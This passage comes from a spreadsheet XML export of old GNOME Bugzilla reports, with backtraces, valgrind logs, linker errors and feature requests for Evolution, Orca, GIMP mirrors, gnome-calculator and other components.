#3  0x40342262 in gnome_segv_handle (signum=11) at gnome-init.c:659
	in gnome-init.c
estatus = 1075139230
in_segv = 1
pid = 0
#4  0x406f14c7 in pthread_sighandler (signo=11 ctx=
      {gs = 0 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 edi = 1852403824 esi = 134647184 ebp = 3221222328 esp = 3221222296 ebx = 134767576 edx = 1081068704 ecx = 1 eax = 134832584 trapno = 14 err = 4 eip = 134562111 cs = 35 __csh = 0 eflags = 66194 esp_at_signal = 3221222296 ss = 43 __ssh = 0 fpstate = 0xbffff118 oldmask = 2147483648 cr2 = 1852403824}) at signals.c:97
	in signals.c
self = 0x406fa460
in_sighandler = 0x0
self = 0x406fa460
in_sighandler = 0x0
#5  
No locals.
#6  0x0805413f in savePilotState () at eval.c:41
	in eval.c
ap = (void **) 0x8068d90
digval = 4294966784
digval = 4294966784
digval = 4294966784
digval = 4294966784
result = 134647184
result = 134647184
value = (void *) 0xbfffefec
#7  0x08053922 in save_config_and_restart () at eval.c:41
41	in eval.c
ap = (void **) 0x8068d90
digval = 4294966784
digval = 4294966784
digval = 4294966784
digval = 4294966784
result = 134647184
result = 134647184
value = (void *) 0xbfffefec
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-11-09 20:44 -------
The original reporter (tbudd@exadata.com) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component eskil@eskil.dk.
</t>
  </si>
  <si>
    <t>tbudd</t>
  </si>
  <si>
    <t>EVOLUTION-329694</t>
  </si>
  <si>
    <t>Visual needs translator comments</t>
  </si>
  <si>
    <t>#: ../widgets/misc/e-charset-picker.c:103
msgid Visual
what shall it mean in this context?
please add translator comments:
http://developer.gnome.org/doc/tutorials/gnome-i18n/developer.html#use-comments
quoting the code here:
/* This list is based on what other mailers/browsers support. There's
 * not a lot of point in using say ISO-8859-3 if anything that can
 * read that can read UTF8 too.
 */
static ECharset charsets[] = {
	{ ISO-8859-13 E_CHARSET_BALTIC NULL }
	{ ISO-8859-4 E_CHARSET_BALTIC NULL }
	{ ISO-8859-2 E_CHARSET_CENTRAL_EUROPEAN NULL }
	{ Big5 E_CHARSET_CHINESE N_(Traditional) }
	{ BIG5HKSCS E_CHARSET_CHINESE N_(Traditional) }
	{ EUC-TW E_CHARSET_CHINESE N_(Traditional) }
	{ GB18030 E_CHARSET_CHINESE N_(Simplified) }
	{ GB2312 E_CHARSET_CHINESE N_(Simplified) }
	{ HZ E_CHARSET_CHINESE N_(Simplified) }
	{ ISO-2022-CN E_CHARSET_CHINESE N_(Simplified) }
	{ KOI8-R E_CHARSET_CYRILLIC NULL }
	{ Windows-1251 E_CHARSET_CYRILLIC NULL }
	{ KOI8-U E_CHARSET_CYRILLIC N_(Ukrainian) }
	{ ISO-8859-5 E_CHARSET_CYRILLIC NULL }
	{ ISO-8859-7 E_CHARSET_GREEK NULL }
	{ ISO-8859-8 E_CHARSET_HEBREW N_(Visual) }
	{ ISO-2022-JP E_CHARSET_JAPANESE NULL }
	{ EUC-JP E_CHARSET_JAPANESE NULL }
	{ Shift_JIS E_CHARSET_JAPANESE NULL }
	{ EUC-KR E_CHARSET_KOREAN NULL }
	{ ISO-8859-9 E_CHARSET_TURKISH NULL }
	{ UTF-8 E_CHARSET_UNICODE NULL }
	{ UTF-7 E_CHARSET_UNICODE NULL }
	{ ISO-8859-1 E_CHARSET_WESTERN_EUROPEAN NULL }
	{ ISO-8859-15 E_CHARSET_WESTERN_EUROPEAN_NEW NULL }</t>
  </si>
  <si>
    <t>GNOME-CALCULATOR-371669</t>
  </si>
  <si>
    <t>Floating Hexadecimal values converting to any</t>
  </si>
  <si>
    <t>Please describe the problem:
When you enter a floating point hexa value like 0.9A9E (somewhere around 0.608 in decimal) gcalc refuses to convert it. 'no sane value to convert'. However  if you enter 0.608 in decimal and then convert it to hex  it returns : 0.9A9FBE76D now it is able to convert it back to decimal.
Steps to reproduce:
1. change to scientific mode
2. set it in hexadecimal
3. enter 0.9A9E
4. change it to decimal
Actual results:
admire the 'no sane value to convert' message at the bottom
Expected results:
converting the value to somewhere around 0.608
Does this happen every time?
yes a friend of mine tried and had the same results.
Other information:</t>
  </si>
  <si>
    <t>ewaldvangeffen</t>
  </si>
  <si>
    <t>GIMP-WEB-426641</t>
  </si>
  <si>
    <t>download mirrors</t>
  </si>
  <si>
    <t>New mirror</t>
  </si>
  <si>
    <t>hello
I have mirror ftp.gimp.org
details:
http://piotrkosoft.net/pub/mirrors/ftp.gimp.org
ftp://ftp.piotrkosoft.net/pub/mirrors/ftp.gimp.org
rsync://piotrkosoft.net/mirrors/ftp.gimp.org
Poland
Piotr Maluty
Piotrkosoft.net
Piotrkosoft - Data Storage Center</t>
  </si>
  <si>
    <t>EVOLUTION-216330</t>
  </si>
  <si>
    <t>selecting and deselecting mails to delete</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 0.99.2
Synopsis: selecting and deselecting mails to delete
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
&gt; Hi in a vFolder I press ctrl and a to select all mails then while
&gt; holding the ctrl key deselect a thread the buttons on the tool bar
are
&gt; all grayed out so I cant press the trahs can pressing ctrl d also
has
&gt; no effect.
&gt; 
&gt; If I then while holding the ctrl key down deselect andother message
&gt; then re-select it so that all the mails are selected but the original
&gt; thread I deselected the tool bar buttons are active agian but
deleteing
&gt; only deletes the last mial - de. then re selected. not all the maisl
&gt; that are highlighted i nthe table.
</t>
  </si>
  <si>
    <t>on_the_net</t>
  </si>
  <si>
    <t>GALEON-84204</t>
  </si>
  <si>
    <t>Should use gnome font selector in preferences</t>
  </si>
  <si>
    <t>I'm not sure if there are any technical reasons why  galeon can't use the
gnome font selector but if can it would be real nice since the current
spinner font chooser can become very hard to use when a large number of
fonts are available (this was a huge complaint about the old nautilus font
choosers.)</t>
  </si>
  <si>
    <t>GNOME-COMMON-159074</t>
  </si>
  <si>
    <t>Need to check for IT_PROG_INTLTOOL as well</t>
  </si>
  <si>
    <t>Intlool has been updated to use the IT_ prefix for autoconf macros that it owns.
The attached patch adds support for the IT_PROG_INTLTOOL command as well as the
AC_PROG_INTLTOOL_COMMAND.</t>
  </si>
  <si>
    <t>EVOLUTION-DATA-SERVER-342479</t>
  </si>
  <si>
    <t>memory leak in e-name-selector-dialog.c</t>
  </si>
  <si>
    <t>Please describe the problem:
memory leak in e-name-selector-dialog.c
Steps to reproduce:
1. 
2. 
3. 
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>NAUTILUS-CD-BURNER-364539</t>
  </si>
  <si>
    <t>The gtk-doc-strings should be used to generate documentation</t>
  </si>
  <si>
    <t>Documentation 
Section: 
Apparently the source code for nautilus cd burn does contain doc strings. However it's not currently being used to generate any documentation. It should be used...
Correct version:
Other information:</t>
  </si>
  <si>
    <t>ozamosi</t>
  </si>
  <si>
    <t>BEAGLE-393456</t>
  </si>
  <si>
    <t>File paths with the last folder path having same prefix cannot be added to beagle search</t>
  </si>
  <si>
    <t>File paths whose last folder has a name whose prefix matches that of another folder cannot be added
for eg /media/hda3/music and /media/hda3/music+* cannot both be added</t>
  </si>
  <si>
    <t>desheikh</t>
  </si>
  <si>
    <t>ORCA-523468</t>
  </si>
  <si>
    <t>oocalc/bug_435307.py regression tests #1 through #2 produce the wrong results.</t>
  </si>
  <si>
    <t>Test 1 of 2 FAILED: /home/richb/gnome/orca/trunk/test/keystrokes/oocalc/bug_435307.py:Type Alt-f to select the Freeze menu item [1]
EXPECTED:
     BRAILLE LINE:  'soffice Application fruit - OpenOffice.org Calc Frame fruit - OpenOffice.org Calc RootPane ScrollPane Document view4 Sheet Sheet1 Table'
          VISIBLE:  'Sheet Sheet1 Table' cursor=1
     BRAILLE LINE:  'soffice Application fruit - OpenOffice.org Calc Frame fruit - OpenOffice.org Calc RootPane ScrollPane Document view4 Sheet Sheet1 Table Apples Cell B1 '
          VISIBLE:  'Apples Cell B1 ' cursor=1
     SPEECH OUTPUT: 'Sheet Sheet1 table grayed'
     SPEECH OUTPUT: 'Apples B1'
ACTUAL:
     BRAILLE LINE:  'soffice Application Frame fruit - OpenOffice.org Calc RootPane ScrollPane Document view4 Sheet Sheet1 Table'
          VISIBLE:  'Sheet Sheet1 Table' cursor=1
     BRAILLE LINE:  'soffice Application Frame fruit - OpenOffice.org Calc RootPane ScrollPane Document view4 Sheet Sheet1 Table Apples 0 Cell'
          VISIBLE:  'Apples 0 Cell' cursor=1
     SPEECH OUTPUT: ''
     SPEECH OUTPUT: 'Sheet Sheet1 table grayed'
     SPEECH OUTPUT: ''
     SPEECH OUTPUT: 'Apples'
     SPEECH OUTPUT: ' not selected'
Test 2 of 2 FAILED: /home/richb/gnome/orca/trunk/test/keystrokes/oocalc/bug_435307.py:Type Alt-f to select the Freeze menu item [2]
EXPECTED:
     BRAILLE LINE:  'soffice Application fruit - OpenOffice.org Calc Frame fruit - OpenOffice.org Calc RootPane ScrollPane Document view3 Sheet Sheet1 Table'
          VISIBLE:  'Sheet Sheet1 Table' cursor=1
     BRAILLE LINE:  'soffice Application fruit - OpenOffice.org Calc Frame fruit - OpenOffice.org Calc RootPane ScrollPane Document view3 Sheet Sheet1 Table Apples Cell B1 '
          VISIBLE:  'Apples Cell B1 ' cursor=1
     SPEECH OUTPUT: 'Sheet Sheet1 table grayed'
     SPEECH OUTPUT: 'Apples B1'
ACTUAL:
     BRAILLE LINE:  'soffice Application Frame fruit - OpenOffice.org Calc RootPane ScrollPane Document view3 Sheet Sheet1 Table'
          VISIBLE:  'Sheet Sheet1 Table' cursor=1
     BRAILLE LINE:  'soffice Application Frame fruit - OpenOffice.org Calc RootPane ScrollPane Document view3 Sheet Sheet1 Table Apples 0 Cell'
          VISIBLE:  'Apples 0 Cell' cursor=1
     SPEECH OUTPUT: ''
     SPEECH OUTPUT: 'Sheet Sheet1 table grayed'
     SPEECH OUTPUT: ''
     SPEECH OUTPUT: 'Apples'
     SPEECH OUTPUT: ' not selected'</t>
  </si>
  <si>
    <t>GNOME-SYSTEM-TOOLS-128069</t>
  </si>
  <si>
    <t>Add support for Fedora Core</t>
  </si>
  <si>
    <t>The tools do not currently identify Fedora Core as a supported system.
This should be very easy to add.  It is probably identical to RedHat 9.</t>
  </si>
  <si>
    <t>GNOME-UTILS-167091</t>
  </si>
  <si>
    <t>the use of gnome_entry is deprecated</t>
  </si>
  <si>
    <t>Please describe the problem:
You can see this bugreport as a todo for gnome 3.0.
Steps to reproduce:
1. 
2. 
3. 
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-70306</t>
  </si>
  <si>
    <t>Main Menu entry runs wrong control-center</t>
  </si>
  <si>
    <t>This is about Gnome Alpha 2 built with garnome
Action: Go to main menu at top panel choose Control Center
Result: gnomecc from old Gnome install (1.4) is run 
Expected: Control Center for Gnome 2 is run</t>
  </si>
  <si>
    <t>mario.vukelic</t>
  </si>
  <si>
    <t>GNOME-UTILS-317208</t>
  </si>
  <si>
    <t>Build failure with gcc 2.95</t>
  </si>
  <si>
    <t>Version details: 2.12.0
The attached patch fixes compile errors with gcc 2.95 caused by C99-style
variable declarations.</t>
  </si>
  <si>
    <t>LIBRSVG-402246</t>
  </si>
  <si>
    <t>Leaks list data</t>
  </si>
  <si>
    <t>I was valgrinding my app and noticed that librsvg is leaking quite a bit.
==18582== 432 bytes in 36 blocks are definitely lost in loss record 4096 of 4458
==18582==    at 0x4021396: malloc (vg_replace_malloc.c:149)
==18582==    by 0x46A5CE5: g_malloc (gmem.c:131)
==18582==    by 0x46B5747: g_slice_alloc (gslice.c:777)
==18582==    by 0x469C5D5: g_list_prepend (glist.c:95)
==18582==    by 0x5AC7174: rsvg_cairo_push_discrete_layer (rsvg-cairo-draw.c:855)
==18582==    by 0x5AC8626: rsvg_cairo_render_path (rsvg-cairo-draw.c:507)
==18582==    by 0x5AC36FD: rsvg_render_path (rsvg-base.c:1589)
==18582==    by 0x5AB8D9A: rsvg_node_path_draw (rsvg-shapes.c:60)
==18582==    by 0x5ABB90D: rsvg_node_draw (rsvg-structure.c:53)
==18582==    by 0x5ABBB69: _rsvg_node_draw_children (rsvg-structure.c:69)
==18582==    by 0x5ABB90D: rsvg_node_draw (rsvg-structure.c:53)
==18582==    by 0x5ABBB69: _rsvg_node_draw_children (rsvg-structure.c:69)
==18582== 300 bytes in 25 blocks are definitely lost in loss record 4077 of 4458
==18582==    at 0x4021396: malloc (vg_replace_malloc.c:149)
==18582==    by 0x46A5CE5: g_malloc (gmem.c:131)
==18582==    by 0x46B5747: g_slice_alloc (gslice.c:777)
==18582==    by 0x469C5D5: g_list_prepend (glist.c:95)
==18582==    by 0x5AC71B4: rsvg_cairo_push_discrete_layer (rsvg-cairo-draw.c:860)
==18582==    by 0x5AC3040: rsvg_push_discrete_layer (rsvg-base.c:1577)
==18582==    by 0x5ABBB2C: _rsvg_node_draw_children (rsvg-structure.c:65)
==18582==    by 0x5ABB90D: rsvg_node_draw (rsvg-structure.c:53)
==18582==    by 0x5ABBB69: _rsvg_node_draw_children (rsvg-structure.c:69)
==18582==    by 0x5ABB90D: rsvg_node_draw (rsvg-structure.c:53)
==18582==    by 0x5ABBB69: _rsvg_node_draw_children (rsvg-structure.c:69)
==18582==    by 0x5ABB90D: rsvg_node_draw (rsvg-structure.c:53)
and so on.  I'll attach a full valgrind log.</t>
  </si>
  <si>
    <t>GNOME-SYSTEM-TOOLS-319553</t>
  </si>
  <si>
    <t>system-tools-backends: ISDN/CAPI: password in pap-secrets ignored</t>
  </si>
  <si>
    <t>Distribution/Version: Ubuntu Linux 5.10 Breezy
When setting up a ISDN connection with network-admin the password in
pap-secrets gets ignored and the system looks for it in /etc/ppp/peers/ppp0.
Solution:
Don't load the plugin userpass.so in network.pl
files/general_isdn_ppp_options.</t>
  </si>
  <si>
    <t>VTE-406763</t>
  </si>
  <si>
    <t>Selecting double-wide characters</t>
  </si>
  <si>
    <t>Finding the column start and end should take into account cell-&gt;fragment.</t>
  </si>
  <si>
    <t>EVOLUTION-212624</t>
  </si>
  <si>
    <t>appending message - interrupted systemcall/success</t>
  </si>
  <si>
    <t>Description of Problem:
This just started happening today although I have been using 0.15 (beta 5)
since it's release and I have no problems up until now. Whenever Evolutions
tries to download my new mail over POP3 (either automatically or when I hit
Send/Receive) I get the same error message dialog each time and no new
messages are added to my Inbox. The error message is:
Error while 'Fetching Mail':
Cannot append message to mbox file: /u/pbaker/evolution/local/Inbox//mbox:
Success
It looks like this could be related to bug#211100 or perhaps even a
duplicate except that one says Interrupted system call or Operation now
in progress and of course mine says Success.
This is very major since I can't receive any new mail through Evolution. I
have tried killev and oaf-slay as well as manually killing ANY stray
processes I see and nothing seems to help.
Steps to reproduce the problem:
1. Start Evolution.
2. Click Send/Receive Mail.
Actual Results:
Error dialog appears with the error message:
Error while 'Fetching Mail':
Cannot append message to mbox file: /u/pbaker/evolution/local/Inbox//mbox:
Success
Expected Results:
New messages should appear in my Inbox with no error messages.
How often does this happen? 
Everytime.
Additional Information:
Here is a directly listing of /u/pbaler/evolution/local/Inbox
total 3480
-rw-r--r--    1 pbaker   pbaker        103 Oct  3 23:31 folder-metadata.xml
-rw-r--r--    1 pbaker   pbaker         95 Oct 15 16:22 local-metadata.xml
-rw-------    1 pbaker   pbaker    2472777 Oct 15 16:39 mbox
-rw-------    1 pbaker   pbaker      56236 Oct 15 16:39 mbox.ev-summary
-rw-------    1 pbaker   pbaker    1009664 Oct 15 16:39 mbox.ibex
The timestamp on everything but folder-metadata.xml does go up everytime I
hit send/receive even though the size or data never changes.
I also gave this a Blocker priority because it is BLOCKING me from using
Evolution. I guess I'll have to use Mozilla until this gets fixed some how.</t>
  </si>
  <si>
    <t>SYSTEM-MONITOR-356111</t>
  </si>
  <si>
    <t>Wrong password causes crash...</t>
  </si>
  <si>
    <t>That bug has been opened on https://launchpad.net/distros/ubuntu/+source/gnome-system-monitor/+bug/60112
Binary package hint: gnome-system-monitor
If you try to end a system process such as cron syslogd cupsd etc. and enter the wrong password when prompted the application will crash.
The problem was discovered in gnome-system-monitor 2.16.0-0ubuntu1
Backtrace of the crash:
GNOME_SUDO_PASS
sudo: 1 incorrect password attempt
** ERROR **: Could not run gksu_run(kill -s 15 4365) : Wrong password.
aborting...
Program received signal SIGABRT Aborted.
[Switching to Thread 47868129290976 (LWP 29280)]
0x00002b8928db747b in *__GI_raise () from /lib/libc.so.6
(gdb) bt
#0  0x00002b8928db747b in *__GI_raise () from /lib/libc.so.6
#1  0x00002b8928db8da0 in *__GI_abort () from /lib/libc.so.6
#2  0x00002b8928b07e50 in IA__g_logv (log_domain=0x0 log_level= 
    format=0x41b6e0 Could not run gksu_run(\%s\) : %s\n args1=0x7fff855455b0) at gmessages.c:497
#3  0x00002b8928b07ed3 in IA__g_log (log_domain=0x7260  log_level=29280 
    format=0x6 ) at gmessages.c:517
#4  0x0000000000417280 in procman_gksu_create_root_password_dialog (command=0x6e7340 kill -s 15 4365)
    at procman_gksu.c:36
#5  0x00000000004117c9 in procdialog_create_root_password_dialog (type= 
    procdata= pid= extra_value=) at procdialogs.c:868
#6  0x00000000004115f0 in kill_single_process (model= path= 
    iter= data=0x7fff855457c0) at procactions.c:142
#7  0x00002b8926c8aa1c in IA__gtk_tree_selection_selected_foreach (selection=0x607480 
    func=0x4114c0  data=0x7fff855457c0) at gtktreeselection.c:643
#8  0x000000000041142f in kill_process (procdata=0x598130 sig=) at procactions.c:183
#9  0x0000000000413ad0 in kill_dialog_button_pressed (dialog=0xa37000 id=-5 data=)
    at procdialogs.c:105
#10 0x00002b89283a259a in IA__g_closure_invoke (closure=0xa394c0 return_value=0x0 n_param_values=2 
    param_values=0x7fff85545a80 invocation_hint=0x7fff85545950) at gclosure.c:490
#11 0x00002b89283b1b18 in signal_emit_unlocked_R (node=0xa27da0 detail=0 instance=0xa37000 emission_return=0x0 
    instance_and_params=0x7fff85545a80) at gsignal.c:2438</t>
  </si>
  <si>
    <t>GTKMM-309030</t>
  </si>
  <si>
    <t>Gtk::TreeModelColumn not imported properly on windows</t>
  </si>
  <si>
    <t>Please describe the problem:
Gtk 2.4.14 &amp; 2.6.8
gtkmm 2.4.8 2.4.10 2.4.11 2.6.3
windows xp
mingw gcc 3.4.2 &amp; 3.4.4
The linker fails to link examples that use Treeview.  Here is the output:
Info: resolving VTT for Gtk::TreeViewColumn by linking to
__imp___ZTTN3Gtk14TreeViewColumnE (auto-import)
Info: resolving vtable for Gtk::TreeViewColumnby linking to
__imp___ZTVN3Gtk14TreeViewColumnE (auto-import)
messageslist.o: In function
`ZN3Gtk14TreeViewColumnC1IN4Glib7ustringEEERKS3_RKNS_15TreeModelColumnIT_EE':
C:/msys/1.0/home/Kid/gtkmm-2.6.3/examples/book/paned/../../../gtk/gtkmm/treeviewcolumn.h:(.text$_ZN3Gtk14TreeViewColumnC1IN4Glib7ustringEEERKS3_RKNS_15TreeModelColumnIT_EE[Gtk::TreeViewColumn::TreeViewColumn(Glib::ustring
const&amp; Gtk::TreeModelColumn const&amp;)]+0x1c): variable 'VTT for
Gtk::TreeViewColumn' can't be auto-imported. Please read the documentation for
ld's --enable-auto-import for details.
C:/msys/1.0/home/Kid/gtkmm-2.6.3/examples/book/paned/../../../gtk/gtkmm/treeviewcolumn.h:(.text$_ZN3Gtk14TreeViewColumnC1IN4Glib7ustringEEERKS3_RKNS_15TreeModelColumnIT_EE[Gtk::TreeViewColumn::TreeViewColumn(Glib::ustring
const&amp; Gtk::TreeModelColumn const&amp;)]+0xb8): variable 'VTT for
Gtk::TreeViewColumn' can't be auto-imported. Please read the documentation for
ld's --enable-auto-import for details.
C:/msys/1.0/home/Kid/gtkmm-2.6.3/examples/book/paned/../../../gtk/gtkmm/treeviewcolumn.h:(.text$_ZN3Gtk14TreeViewColumnC1IN4Glib7ustringEEERKS3_RKNS_15TreeModelColumnIT_EE[Gtk::TreeViewColumn::TreeViewColumn(Glib::ustring
const&amp; Gtk::TreeModelColumn const&amp;)]+0x173): variable 'VTT for
Gtk::TreeViewColumn' can't be auto-imported. Please read the documentation for
ld's --enable-auto-import for details.
messageslist.o: In function `ZN12MessagesListD1Ev':
C:/msys/1.0/home/Kid/gtkmm-2.6.3/examples/book/paned/messageslist.cc:51:
variable 'VTT for Gtk::TreeViewColumn' can't be auto-imported. Please read the
documentation for ld's --enable-auto-import for details.
C:/msys/1.0/home/Kid/gtkmm-2.6.3/examples/book/paned/messageslist.cc:51:
variable 'VTT for Gtk::TreeViewColumn' can't be auto-imported. Please read the
documentation for ld's --enable-auto-import for details.
messageslist.o: In function
`ZN3Gtk14TreeViewColumnC1IN4Glib7ustringEEERKS3_RKNS_15TreeModelColumnIT_EE':
C:/msys/1.0/home/Kid/gtkmm-2.6.3/examples/book/paned/../../../gtk/gtkmm/treeviewcolumn.h:(.text$_ZN3Gtk14TreeViewColumnC1IN4Glib7ustringEEERKS3_RKNS_15TreeModelColumnIT_EE[Gtk::TreeViewColumn::TreeViewColumn(Glib::ustring
const&amp; Gtk::TreeModelColumn const&amp;)]+0xf1): variable 'vtable for
Gtk::TreeViewColumn' can't be auto-imported. Please read the documentation for
ld's --enable-auto-import for details.
C:/msys/1.0/home/Kid/gtkmm-2.6.3/examples/book/paned/../../../gtk/gtkmm/treeviewcolumn.h:(.text$_ZN3Gtk14TreeViewColumnC1IN4Glib7ustringEEERKS3_RKNS_15TreeModelColumnIT_EE[Gtk::TreeViewColumn::TreeViewColumn(Glib::ustring
const&amp; Gtk::TreeModelColumn const&amp;)]+0xf8): variable 'vtable for
Gtk::TreeViewColumn' can't be auto-imported. Please read the documentation for
ld's --enable-auto-import for details.
Steps to reproduce:
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>PAN-81258</t>
  </si>
  <si>
    <t>article-specific: crash on pressing rewrap in f'up2 newsgroup freeze on Show All Headers in Article Pane</t>
  </si>
  <si>
    <t>Warning: It might well being my system screwed up. Tell me what info you
need to know in particular.
I installed pan using pan-0.11.3-1.i686.rpm from
http://pan.rebelbase.com/download/releases/0.11.3/MANDRAKE_81/
When I read
Message-ID:  (in
news://alt.linux) then Follow up to newsgroup and press rewrap button
pan crashes(sometimes it just freezed?!!?).
As far as I could easily test this bug appears ONLY with this specific
article!
When I tried to get the article's MSGID with View/Show All Headers in
Article Pane(and even h) while displaying 'Message'-tab pan freezes.
Should that be filed as different bug? WORK-AROUND: switch to
'Articles'-tab press h switch back to 'Message'-tab.
Bug occurs under fluxboxXFceKDE(2.2.1) and GNOME.
STEP BY STEP:
)execute pan with alt.linux subscribed
)double-click on alt.linux in 'Groups'-tab
)double-click on A newbie with problems installing new software. in
'Articles'-tab
)goto menu: Post/Follow-Up to newsgroup
)In new window click on button rewrap
BANG!
As soon as I spy out how to submit bt&amp;runlog to bugzilla you'll get them
they're ready.</t>
  </si>
  <si>
    <t>georgd</t>
  </si>
  <si>
    <t>EVOLUTION-242127</t>
  </si>
  <si>
    <t>Duplicates in pop3 mailbox</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 1.2
Synopsis: Duplicates in pop3 mailbox
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
Description of Problem:
Whenever I send/receive Evo puts duplicates of all my already received
emails as new ones in my mail folder.  This just started happening
after I upgraded to 1.2.
Steps to reproduce the problem:
1. 
2. 
3. 
Actual Results:
Expected Results:
How often does this happen?
Additional Information:
Unknown reporter: chikin03@yahoo.com changed to bugbuddy-import@ximian.com.
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>chikin03</t>
  </si>
  <si>
    <t>RHYTHMBOX-323505</t>
  </si>
  <si>
    <t>crash on shutdown related to GtkFileChooserButton</t>
  </si>
  <si>
    <t>Rhythmbox crashes on shutdown for me if I've opened the preferences dialog
during the lifetime of the process.  Usually before it crashes there are
hundreds of warnings like this:
(rhythmbox:22852): Gtk-CRITICAL **: gtk_icon_theme_load_icon: assertion
`GTK_IS_ICON_THEME (icon_theme)' failed
It's something to do with the file chooser buttons used in the library and
podcast preferences pages.  If I remove them the crash goes away.  Valgrind
tells me nothing.  I'm using the gtk+ 2.8.8-1 packages from debian experimental.</t>
  </si>
  <si>
    <t>GTK+-494776</t>
  </si>
  <si>
    <t>text file with html causes lockeup</t>
  </si>
  <si>
    <t>Steps to reproduce:
right click on .html file and select Open with Text Editor. Ubuntu Gutsy.
Stack trace:
Other information:
No clear instructions in place for how to do a stack this on Ubuntu Gutsy. http://live.gnome.org/GettingTraces</t>
  </si>
  <si>
    <t>GNOME-CORE-28317</t>
  </si>
  <si>
    <t>desk-guide-applet crashes all the time</t>
  </si>
  <si>
    <t xml:space="preserve">Package:  gnome-applets
Severity: grave
Version:  1.2.2.1
Synopsis: desk-guide-applet crashes all the time
Class:    sw-bug
Distribution: Linux Mandrake release 7.1 (helium)
System: Linux 2.2.16-9mdk i686 unknown
C library: glibc-2.1.3-17mdk
C compiler: 2.95.3
glib: 1.2.8
GTK+: 1.2.8
ORBit: ORBit 0.5.3
gnome-libs: gnome-libs 1.2.4
libxml: libxml-1.8.10-0mdk_helix_1
gnome-print: gnome-print-0.20
gnome-core: gnome-core-1.2.2.1-0mdk_helix_2
Description:
It crashes frequently and I have no idea why. Doesn't seem to follow
anything particular that I do.  I usually have a Java application
running (ForteCE + JDK1.3) and Mozilla so one of them might be the
culprit.  helix here on top of Mandrake 7.1 - otherwise running great.
Love helix thanks!
Debugging information:
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...0x405dad59 in __wait4 () from /lib/libc.so.6
#0  0x405dad59 in __wait4 () from /lib/libc.so.6
#1  0x4063b820 in ?? () from /lib/libc.so.6
#2  0x4015cd1a in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
#3  0x0 in ?? ()
#0  0x405dad59 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x4063b820 in ?? () from /lib/libc.so.6
No symbol table info available.
#2  0x4015cd1a in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
No symbol table info available.
#3  0x0 in ?? ()
No symbol table info available.
#0  0x0 in ?? ()
No symbol table info available.
#0  0x0 in ?? ()
No symbol table info available.
#0  0x0 in ?? ()
No symbol table info available.
#0  0x0 in ?? ()
No symbol table info available.
------- Bug moved to this database by debbugs-export@bugzilla.gnome.org 2001-01-27 17:01 -------
This bug was previously known as bug 28317 at http://bugs.gnome.org/
http://bugs.gnome.org/show_bug.cgi?id=28317
Originally filed under the gnome-applets product and general component.
The original reporter (dcolling@abyssnet.com) of this bug does not have an account here.
Reassigning to the exporter debbugs-export@bugzilla.gnome.org.
Reassigning to the default owner of the component gnome-applets-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>dcolling</t>
  </si>
  <si>
    <t>NAUTILUS-97603</t>
  </si>
  <si>
    <t>notes component should have a slight shadow</t>
  </si>
  <si>
    <t>The notes component looks really flat in the properties view and sidebar.
It be nice to have a little inwards shadow.</t>
  </si>
  <si>
    <t>GDESKLETS-173051</t>
  </si>
  <si>
    <t>gdesklets stop did not work n FreeBSD</t>
  </si>
  <si>
    <t>Version details: 0.34.3
Distribution/Version: 5.3-STABLE
stop desklets with gdesklets stop
see attached patch</t>
  </si>
  <si>
    <t>GOK-140860</t>
  </si>
  <si>
    <t>GOK docs need to warn user against docking GOK on same edge as a panel</t>
  </si>
  <si>
    <t>If the user does this GOK can easily be obscured by panel popups etc.</t>
  </si>
  <si>
    <t>EVOLUTION-256904</t>
  </si>
  <si>
    <t>search for the contacts is not working properly</t>
  </si>
  <si>
    <t>Please fill in this template when reporting a bug unless you know what you
are doing.
Description of Problem:
Search for the contacts is not working when same type of search performed
one after the other.
Steps to reproduce the problem:
1. Go to contacts 
   [all the contacts will be displayed]
2. Go to the field NAME BEGINS WITH  on the search bar and select the
search criteria
  [like -any field contains]
3. then in the next field enter for what you are searching 
4.click on find now button
5. All search results will be displayed.
6. press the clear button
   [all the contacts will be displyed]
7. repeat the steps 2 to step 4 again
Actual Results:
Find now button does not works and we are unable to perform any search
Expected Results:
All the cotacts that satisfy the search condition should be displyed
How often does this happen? 
almost every time
Additional Information:</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-65277</t>
  </si>
  <si>
    <t xml:space="preserve">Package: control-center
Severity: normal
Version: 1.0.51
&gt;Synopsis: 
&gt;Class: sw-bug
Distribution: Red Hat Linux release 6.2 (Zoot)
System: Linux 2.2.14-5.0 i686 unknown
C library: glibc-2.1.3-15
C compiler: egcs-2.91.66
glib: 1.2.6
GTK+: 1.2.6
ORBit: ORBit 0.5.0
gnome-libs: gnome-libs 1.0.55
gnome-core: gnome-core-1.0.55-12
Debugging information:
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...0x405af8e9 in __wait4 () from /lib/libc.so.6
#0  0x405af8e9 in __wait4 () from /lib/libc.so.6
#1  0x4060e1ec in ?? () from /lib/libc.so.6
#2  0x4014d591 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
#3  0x4053cc68 in __restore ()
    at ../sysdeps/unix/sysv/linux/i386/sigaction.c:127
#4  0x4028eefd in gtk_marshal_NONE__NONE () from /usr/lib/libgtk-1.2.so.0
#5  0x402bc5fd in gtk_handlers_run () from /usr/lib/libgtk-1.2.so.0
